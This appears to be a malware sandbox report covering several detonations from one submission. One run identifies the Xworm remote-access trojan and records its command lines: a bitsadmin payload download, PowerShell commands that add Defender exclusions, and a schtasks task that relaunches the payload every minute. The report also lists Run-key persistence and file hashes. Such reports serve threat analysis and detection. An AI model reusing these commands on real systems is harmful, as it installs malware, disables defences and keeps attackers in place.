rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:37

Platform

win10v2004-20240802-en

Max time kernel

597s

Max time network

425s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Output.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\Output.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (4 identical rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A (10 identical rows)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 940 wrote to memory of 208 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 208 wrote to memory of 4220 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 208 wrote to memory of 412 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 412 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

C:\Users\Admin\AppData\Roaming\Output.exe

"C:\Users\Admin\AppData\Roaming\Output.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe (10 identical process instances)

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
N/A 127.0.0.1:7000 N/A tcp (6 identical rows)
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 127.0.0.1:7000 N/A tcp (3 identical rows)
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 N/A tcp (7 identical rows)
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:7000 N/A tcp (54 identical rows)

Files

memory/2596-0-0x00007FFEAD683000-0x00007FFEAD685000-memory.dmp

memory/2596-1-0x00000000005E0000-0x00000000005EE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA1 378d5339f1b675e98c81f4446f9e9ad81bc9da9f
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad
SHA512 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/940-15-0x0000000000B00000-0x0000000000B0C000-memory.dmp

memory/940-18-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp

memory/940-19-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA1 439ce7924db3f534a14d78470c57c98e397969ee
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4
SHA512 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

memory/412-21-0x0000000000040000-0x0000000000050000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfvlerlr.cle.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2488-22-0x000001D567E00000-0x000001D567E22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3072fa0040b347c3941144486bf30c6f
SHA1 e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256 da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA512 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA1 6a9a84e0a11010262ea35790fcdf824193805c76
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405
SHA512 b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:27

Platform

win10v2004-20240802-en

Max time kernel

430s

Max time network

434s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 24.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:31

Platform

win7-20240704-en

Max time kernel

359s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:32

Platform

win10v2004-20240802-en

Max time kernel

417s

Max time network

420s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A